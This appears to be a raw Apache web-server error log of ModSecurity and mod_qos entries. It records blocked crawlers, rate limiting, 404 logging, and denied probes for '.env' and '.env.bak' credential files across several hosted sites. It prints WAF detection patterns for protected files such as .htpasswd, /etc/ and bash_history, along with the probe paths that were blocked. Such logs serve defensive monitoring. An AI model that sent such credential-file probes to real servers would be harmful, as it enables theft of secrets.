[Tue May 26 19:54:04.652468 2026] [security2:error] [pid 93867:tid 94057] [client 185.191.171.17:59778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/sideline-cheer/list/"] [unique_id "ahWtBJCDfrjqoHpuuBKs-QAAATE"]
[Tue May 26 19:54:04.652595 2026] [security2:error] [pid 93867:tid 94057] [client 185.191.171.17:59778] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/sideline-cheer/list/"] [unique_id "ahWtBJCDfrjqoHpuuBKs-QAAATE"]
[Tue May 26 19:54:04.713061 2026] [qos:error] [pid 86490:tid 86679] [client 45.148.10.120:34912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0kwAAAMA
[Tue May 26 19:54:04.719182 2026] [qos:error] [pid 86490:tid 86675] [client 45.148.10.120:34780] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0lAAAALw
[Tue May 26 19:54:04.720692 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBGDRMqfxdEDkoszNFwAAACA
[Tue May 26 19:54:04.722500 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35270] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBGDRMqfxdEDkoszNGAAAABQ
[Tue May 26 19:54:04.736307 2026] [qos:error] [pid 86490:tid 86684] [client 45.148.10.120:34806] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0lQAAAMU
[Tue May 26 19:54:04.738234 2026] [qos:error] [pid 86490:tid 86696] [client 45.148.10.120:34834] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0lgAAANE
[Tue May 26 19:54:04.747291 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0lwAAAOQ
[Tue May 26 19:54:04.751097 2026] [qos:error] [pid 86490:tid 86705] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0mAAAANo
[Tue May 26 19:54:04.754964 2026] [qos:error] [pid 86490:tid 86647] [client 45.148.10.120:35034] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0mQAAAKA
[Tue May 26 19:54:04.763400 2026] [qos:error] [pid 86490:tid 86730] [client 45.148.10.120:35122] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBFZMwN0DpLVWo6K0mgAAAPM
[Tue May 26 19:54:04.824896 2026] [security2:error] [pid 86490:tid 86674] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/themes/.env.bak"] [unique_id "ahWtBFZMwN0DpLVWo6K0mwAAALs"]
[Tue May 26 19:54:04.988528 2026] [security2:error] [pid 86490:tid 86642] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/golang-app/server/.env"] [unique_id "ahWtBFZMwN0DpLVWo6K0pAAAAJs"]
[Tue May 26 19:54:05.011300 2026] [security2:error] [pid 93867:tid 94062] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs9QAAATM"]
[Tue May 26 19:54:05.280824 2026] [security2:error] [pid 93867:tid 94097] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA5CDfrjqoHpuuBKsxAAAAUQ"]
[Tue May 26 19:54:05.290556 2026] [security2:error] [pid 93576:tid 93771] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA2DRMqfxdEDkoszNCAAAADs"]
[Tue May 26 19:54:05.295265 2026] [security2:error] [pid 93868:tid 94305] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F_AAAAb4"]
[Tue May 26 19:54:05.303289 2026] [security2:error] [pid 93868:tid 94316] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F_wAAAck"]
[Tue May 26 19:54:05.304732 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA2DRMqfxdEDkoszNBwAAADI"]
[Tue May 26 19:54:05.310679 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA2DRMqfxdEDkoszNBgAAAHk"]
[Tue May 26 19:54:05.329474 2026] [security2:error] [pid 93868:tid 94352] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F_QAAAe0"]
[Tue May 26 19:54:05.334410 2026] [security2:error] [pid 93867:tid 94032] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA5CDfrjqoHpuuBKsxgAAARw"]
[Tue May 26 19:54:05.340201 2026] [security2:error] [pid 93867:tid 94178] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA5CDfrjqoHpuuBKsywAAAWk"]
[Tue May 26 19:54:05.343563 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25GCwAAAbI"]
[Tue May 26 19:54:05.344003 2026] [security2:error] [pid 93868:tid 94268] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25F9wAAAZk"]
[Tue May 26 19:54:05.388086 2026] [security2:error] [pid 93868:tid 94284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25GBwAAAak"]
[Tue May 26 19:54:05.407192 2026] [security2:error] [pid 93868:tid 94385] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25GCAAAAg4"]
[Tue May 26 19:54:05.410998 2026] [security2:error] [pid 93576:tid 93803] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWtBGDRMqfxdEDkoszNHwAAAFs"]
[Tue May 26 19:54:05.411037 2026] [security2:error] [pid 93868:tid 94362] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25GDAAAAfc"]
[Tue May 26 19:54:05.418239 2026] [security2:error] [pid 93867:tid 94037] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA5CDfrjqoHpuuBKsxwAAASE"]
[Tue May 26 19:54:05.419486 2026] [security2:error] [pid 86490:tid 86742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0HAAAAP8"]
[Tue May 26 19:54:05.419486 2026] [security2:error] [pid 93868:tid 94368] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25GCgAAAf0"]
[Tue May 26 19:54:05.446436 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0IgAAAMk"]
[Tue May 26 19:54:05.448096 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0GgAAAMc"]
[Tue May 26 19:54:05.457312 2026] [security2:error] [pid 93868:tid 94273] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GGQAAAZ4"]
[Tue May 26 19:54:05.459029 2026] [security2:error] [pid 93867:tid 94023] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA5CDfrjqoHpuuBKs0gAAARM"]
[Tue May 26 19:54:05.472570 2026] [security2:error] [pid 93868:tid 94296] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GFAAAAbU"]
[Tue May 26 19:54:05.475200 2026] [security2:error] [pid 86490:tid 86653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0GwAAAKY"]
[Tue May 26 19:54:05.485698 2026] [security2:error] [pid 93868:tid 94299] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GEwAAAbg"]
[Tue May 26 19:54:05.490881 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBFZMwN0DpLVWo6K0dgAAAPg"]
[Tue May 26 19:54:05.491063 2026] [security2:error] [pid 93868:tid 94297] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GGAAAAbY"]
[Tue May 26 19:54:05.507611 2026] [security2:error] [pid 86490:tid 86747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBFZMwN0DpLVWo6K0cQAAAQQ"]
[Tue May 26 19:54:05.509061 2026] [security2:error] [pid 93868:tid 94347] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GFgAAAeg"]
[Tue May 26 19:54:05.515437 2026] [security2:error] [pid 86490:tid 86741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBFZMwN0DpLVWo6K0bQAAAP4"]
[Tue May 26 19:54:05.529586 2026] [security2:error] [pid 93867:tid 94030] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs2wAAARo"]
[Tue May 26 19:54:05.532659 2026] [security2:error] [pid 93868:tid 94343] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA0qK9k_ZUB2Vp25GDQAAAeQ"]
[Tue May 26 19:54:05.532795 2026] [security2:error] [pid 93867:tid 94053] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs3AAAAS8"]
[Tue May 26 19:54:05.534485 2026] [security2:error] [pid 93868:tid 94383] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GGgAAAgw"]
[Tue May 26 19:54:05.535654 2026] [security2:error] [pid 93867:tid 94200] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs2AAAAXM"]
[Tue May 26 19:54:05.540289 2026] [security2:error] [pid 86490:tid 86707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtA1ZMwN0DpLVWo6K0IwAAANw"]
[Tue May 26 19:54:05.541863 2026] [security2:error] [pid 93867:tid 94164] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs4QAAAWM"]
[Tue May 26 19:54:05.544767 2026] [security2:error] [pid 93868:tid 94310] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GIgAAAcM"]
[Tue May 26 19:54:05.561959 2026] [security2:error] [pid 93867:tid 94095] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKtDAAAAUM"]
[Tue May 26 19:54:05.976374 2026] [security2:error] [pid 86490:tid 86736] [client 185.177.72.53:34666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/node-app/server/.env"] [unique_id "ahWtBVZMwN0DpLVWo6K0vgAAAPk"]
[Tue May 26 19:54:06.232390 2026] [qos:error] [pid 93868:tid 94295] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBkqK9k_ZUB2Vp25GYgAAAbQ
[Tue May 26 19:54:06.232952 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWtBlZMwN0DpLVWo6K1CQAAAMQ
[Tue May 26 19:54:06.234874 2026] [qos:error] [pid 93868:tid 94295] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBkqK9k_ZUB2Vp25GZQAAAbQ
[Tue May 26 19:54:06.238714 2026] [qos:error] [pid 93868:tid 94288] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBkqK9k_ZUB2Vp25GawAAAa0
[Tue May 26 19:54:06.239073 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBlZMwN0DpLVWo6K1EwAAALM
[Tue May 26 19:54:06.240152 2026] [qos:error] [pid 93868:tid 94346] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBkqK9k_ZUB2Vp25GbQAAAec
[Tue May 26 19:54:06.241888 2026] [qos:error] [pid 93576:tid 93749] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBmDRMqfxdEDkoszNLgAAACU
[Tue May 26 19:54:06.242516 2026] [qos:error] [pid 86490:tid 86694] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBlZMwN0DpLVWo6K1FAAAAM8
[Tue May 26 19:54:06.242721 2026] [qos:error] [pid 93868:tid 94333] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBkqK9k_ZUB2Vp25GcAAAAdo
[Tue May 26 19:54:06.243027 2026] [qos:error] [pid 93868:tid 94293] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWtBkqK9k_ZUB2Vp25GcQAAAbI
[Tue May 26 19:54:06.291041 2026] [security2:error] [pid 93867:tid 94093] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs2gAAAUI"]
[Tue May 26 19:54:06.293516 2026] [security2:error] [pid 93867:tid 94188] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs7QAAAW0"]
[Tue May 26 19:54:06.293670 2026] [security2:error] [pid 93868:tid 94367] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GIAAAAfw"]
[Tue May 26 19:54:06.296273 2026] [security2:error] [pid 93867:tid 94169] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs7wAAAWU"]
[Tue May 26 19:54:06.296321 2026] [security2:error] [pid 93868:tid 94301] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GJAAAAbo"]
[Tue May 26 19:54:06.296443 2026] [security2:error] [pid 93867:tid 94135] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs6gAAAVY"]
[Tue May 26 19:54:06.302469 2026] [security2:error] [pid 93868:tid 94341] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GJgAAAeI"]
[Tue May 26 19:54:06.322305 2026] [security2:error] [pid 93867:tid 94122] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBJCDfrjqoHpuuBKs5wAAAVA"]
[Tue May 26 19:54:06.330957 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBEqK9k_ZUB2Vp25GJQAAAgk"]
[Tue May 26 19:54:06.339101 2026] [security2:error] [pid 93576:tid 93800] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBmDRMqfxdEDkoszNJgAAAFg"]
[Tue May 26 19:54:06.340900 2026] [security2:error] [pid 86490:tid 86692] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWtBlZMwN0DpLVWo6K01gAAAM0"]
